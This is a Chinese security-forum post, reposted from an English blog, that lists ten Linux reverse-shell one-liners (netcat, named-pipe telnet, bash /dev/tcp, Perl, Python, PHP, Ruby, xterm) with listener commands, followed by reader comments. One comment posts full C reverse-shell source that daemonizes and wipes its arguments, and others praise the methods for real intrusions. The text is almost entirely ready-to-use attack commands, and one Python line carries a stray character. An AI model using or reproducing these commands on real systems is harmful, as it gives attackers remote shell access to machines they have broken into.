Linux下反弹的10种方法

2015-04-08 19:57:27 22 11499


转载的自Kaotic Creations,http://kaoticcreations.blogspot.kr/2012/01/bind-back-connect-reference-guide.html

方法1.
SHELL执行: nc 192.168.1.133 8080 -e /bin/bash
监听执行  :nc -n -vv -l -p 8080

方法2:
SHELL执行:mknod backpipe p && nc 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行: nc -n -vv -l -p 8080

方法3:
SHELL执行:mknod backpipe p && telnet 192.168.1.133 8080 0<backpipe | /bin/bash 1>backpipe
监听执行:nc -n -vv -l -p 8080

方法4:
SHELL执行:
telnet 127.0.0.1 8080 | /bin/bash | telnet 127.0.0.1 8888
监听执行:
nc -n -vv -l -p 8888

方法5:
bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

方法6:
perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


方法7:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connec?t(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

方法8:
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

方法9:
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

方法10:
xterm -display 10.0.0.1:1

关于作者

samgreen4篇文章248篇回复

评论22次

要评论?请先  登录  或  注册
  • 22楼
    2017-11-2 11:26

    bash弹shell的方式最隐蔽,同时推荐一个webtunnel,相对比较隐蔽的方式,适合实战渗透中使用

  • 21楼
    2017-11-2 08:10

    内容丰富,遇到linuxxi统需要反弹的,试了常用的两三条不行。上面的每条都可以试试下,谢谢分享

  • 20楼
    2016-7-11 10:35

    哈哈,这个路子多了

  • 19楼
    2016-5-20 15:24

    一般都用nc来进行反弹,又多了几个思路呀

  • 18楼
    2016-5-20 09:33

    看看怎么样:).

  • 17楼
    2016-4-26 23:14

    这个太好了,反弹一直就是头疼,楼主分享的方法很多。感谢。

  • 16楼
    2016-2-12 11:48

    bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 这个是我最常用的..

  • 15楼
    2015-10-16 10:08

    学xi了。

  • 14楼
    2015-8-22 10:58

    mark下,待有时间测试下。我学xi的还太少啊,看前辈们的评论看到lz的文章都比较熟悉。

  • 13楼
    2015-6-18 22:06

    表示看过此文章,应该比较早的了

  • 12楼
    2015-6-10 22:37

    刚好最近在玩Linux的东西,收藏

  • 11楼
    2015-6-10 20:40

    好文章不错,收藏了。

  • 10楼
    2015-4-11 22:59

    @fjhgx 好久不见你了

  • 9楼
    2015-4-11 15:22

    不错,这下路又多了

  • 8楼
    2015-4-9 20:04

    这是封号季来了所以就转载个帖子水一下吗?

  • 7楼
    2015-4-9 15:21

    贴一个 常用的 c反弹的

    #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> int main(int argc, char *argv[]) {  int fd;  struct sockaddr_in sin;  char rms[21]="rm -f ";   daemon(1,0);  sin.sin_family = AF_INET;  sin.sin_port = htons(atoi(argv[2]));  sin.sin_addr.s_addr = inet_addr(argv[1]);   bzero(argv[1],strlen(argv[1])+1+strlen(argv[2]));   fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP) ;   if ((connect(fd, (struct sockaddr *) &sin, sizeof(struct sockaddr)))<0) {    perror("[-] connect()");    exit(0);  }  strcat(rms, argv[0]);  //system(rms);    dup2(fd, 0);  dup2(fd, 1);  dup2(fd, 2);  execl("/bin/sh","sh -i", NULL);  close(fd);  }

  • 6楼
    2015-4-9 12:27
    lipss

    《各种环境下的渗透测试》这篇写的也很好哟 http://drops.wooyun.org/tips/411

    1
    samgreen

    看了 下源码,“找到切入点后,首先是要弹个shell,一般我用back.py”这个思路很赞,很不错,多谢分享,兄弟

    2

    :-)一看这篇文章就特熟悉,如果最近在学xilinux渗透的话,wooyun drop和91ri,有这类的文章,lz可以多看看之后再总结一篇说不定就攒出精华帖了。。

  • 5楼
    2015-4-9 11:16
    lipss

    《各种环境下的渗透测试》这篇写的也很好哟 http://drops.wooyun.org/tips/411

    1

    看了 下源码,“找到切入点后,首先是要弹个shell,一般我用back.py” 这个思路很赞,很不错,多谢分享,兄弟

  • 4楼
    2015-4-9 11:14

    不好意思,好像漏了条 :( 啊哈哈哈,我贴出来原帖地址了嘛。

  • 3楼
    2015-4-9 10:20

    大兄弟,我看原文内容好像是有11种方法啊 3. Don’t have NETCAT, then try the /dev/tcp socket method TARGET: /bin/bash -i > /dev/tcp/192.168.1.133/8080 0<&1 2>&1 ATTACKER: nc -n -vv -l -p 8080